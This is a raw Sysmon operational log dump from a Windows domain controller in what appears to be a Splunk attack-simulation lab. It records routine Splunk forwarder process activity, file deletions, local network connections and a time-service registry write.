12:08:07.014{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.014{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6627-6064-6401-00000000AE01}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.014{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6627-6064-6401-00000000AE01}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:07.015{266CAFBE-6627-6064-6401-00000000AE01}7020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:08.436{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8874A0844B8903B6C21563B5FF4695CB,SHA256=E0F8D28651D1333D34FB86D348C1F397D9110F373DC9D63BF3112A1CAFE3FD64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:09.482{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E84097A7F3CEED5BE625852CE3EE2688,SHA256=ACB4C192B3A1BDDA97499BB88D82093C837E69B277FE60BA5FC9D315057D407B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:09.451{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6629-6064-6601-00000000AE01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:09.451{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:09.451{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:09.451{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:08:09.451{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:09.451{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6629-6064-6601-00000000AE01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:09.451{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6629-6064-6601-00000000AE01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:09.452{266CAFBE-6629-6064-6601-00000000AE01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:10.545{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF6C4388EB26B1C28A114BBC4E334CBD,SHA256=F2EA664C119EAB20228F61BFD2EA4A08B0FDAB669F82EFC98132474A59CE1163,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000010460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:11.654{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BDDC39D09979B42FD0D633E42E74FBF,SHA256=8EFAF5F3CD2E54F3C776B4FA49C5AF54B063F8A2D364BA4F6EEEA552FD09D924,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:12.654{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D3C90924CD1DFCB08E9DFB4092E10E2,SHA256=4A46DF47B009DE344A3343E2DBFC5A33CD309D9FF61997415596A6F5CA18AAA1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:12.570{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53695-false10.0.1.12-8000- 23542300x800000000000000010462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:13.747{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECF04DDB4C74EFECEEC216EE78865E4F,SHA256=6A0ED4CB962F712B759BB9BCECA75FDD1DE017CDA926B616B09E45AB6AF7890B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000010464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:14.778{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E463824F9ABD9C5C789318106E4A99D,SHA256=14C144A6CECEAE358C8DA2A4F3F8525B72A85E5C5074E63F2315F3C59019F1C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:15.825{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=210F4C9BD892E7C964C08E3CDC11CF42,SHA256=C718B19875B70AB1C7654311C11D3420BE82AADD5054152FE971BFD5E6ECD098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:15.153{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C017D5136C956485970E33C9E559FA1C,SHA256=E1824F4A5093B5942D664824B8B81060EA48E505056C474BDD0FF1A4E9FCD93C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:15.153{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8008E9DFA6D4F295E20648730EC70448,SHA256=451511B5517B85966441BCE12C17E712446BAECF238C01C237A194619DDCF957,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:16.840{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9730D82E70F02BD733C99C6206B5FA00,SHA256=BCE1618D8027908D60859197B401A1A3688EFD363AD1145AA9BECC2B07AE1B86,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:14.539{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53696-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x800000000000000010468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:14.539{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53696-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x800000000000000010471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:17.840{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14702F25B0366186CE7BABDED8CC7DE2,SHA256=46584DFD885CDF53E270F0D3AAC002A0C64C8480E7EA2FC0AD2C1648A8285BA4,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000010472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:18.856{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBA85E9C5DCE1646F31C172F1FFEFECE,SHA256=3BEEED1309D8F82714568FD12BDC9476E01463034C38075BB2D136B284B9D427,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:19.871{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E8C15C8366F7E18932CA21D71F9FC48,SHA256=D8FFE6657383014CD8D3208F7B24A674729E44DBC93952AF3C23634ABD67841B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:20.902{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EF8F6CB62FB2B6451A0EBDCDB2954D8,SHA256=D7EEC942D48B784CD37599EEE014B6E8D96088A0469157EAC5C6F802A2C7B92A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:18.523{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53697-false10.0.1.12-8000- 
23542300x800000000000000010476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:21.917{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9D49442327F2EE47374754251FB4768,SHA256=A2083CF039C5649AC9DA356B00710695E53897FA6A3C748892E28762550C4784,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:22.948{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D15D655D0C41F1A9EF33D5A538DC40F,SHA256=F46B2385866F2550F3B92A1F4CFCC7E7347C989DB43C690D2E886028545B10DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:23.995{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55491DCB385B7D4D17CEE3BFE324D4EC,SHA256=2848E7314FFC757BDD68AF0542ACC74B8FA5B8BD4D88696AE5E607C55FD75333,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:23.664{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53698-false10.0.1.12-8000- 
23542300x800000000000000010479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:25.010{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBCF3FC548B1439110A2136CB7555FC8,SHA256=A01305584F04E8B50A419E528BFADB07A15E7570F62163EFBE429E3A0F23BA16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:26.120{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2014F14025395796CEC32625739DDBFD,SHA256=155EA99B3CF20FF9FE59068DDFFD118FAF7C021E75AF5FDEDAACD99D1CCE9895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:27.151{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DA81104AA1E7554A5628CFD3E48AAE3,SHA256=ADF1A099C55FDFE41762A87A8D53EB7735BEEA9191023C5F6B79C78487457E7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:28.182{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DDBDB1F000612465A2A70FE70E5DC86,SHA256=E6EEFB22FA5F3483326E6C74E446FD2AAF6F91641AEFF1AAF4B67567A8D789D9,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000010485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:08:29.322{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0x8fc29958) 23542300x800000000000000010484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:29.197{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=504778D373243737E968E04339579802,SHA256=ADC478FCDDFB81F7FC2B0577AEA20F35581986C93883DD167235082704CCD77C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:29.617{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53699-false10.0.1.12-8000- 23542300x800000000000000010486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:30.228{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D98D99F29499A6A4EBE53413F2BBEAC9,SHA256=61143D0383068C532B5418C51F3C0B4E7493FD60A175AB54ED62B98966D3946C,IMPHASH=00000000000000000000000000000000falsetrue 
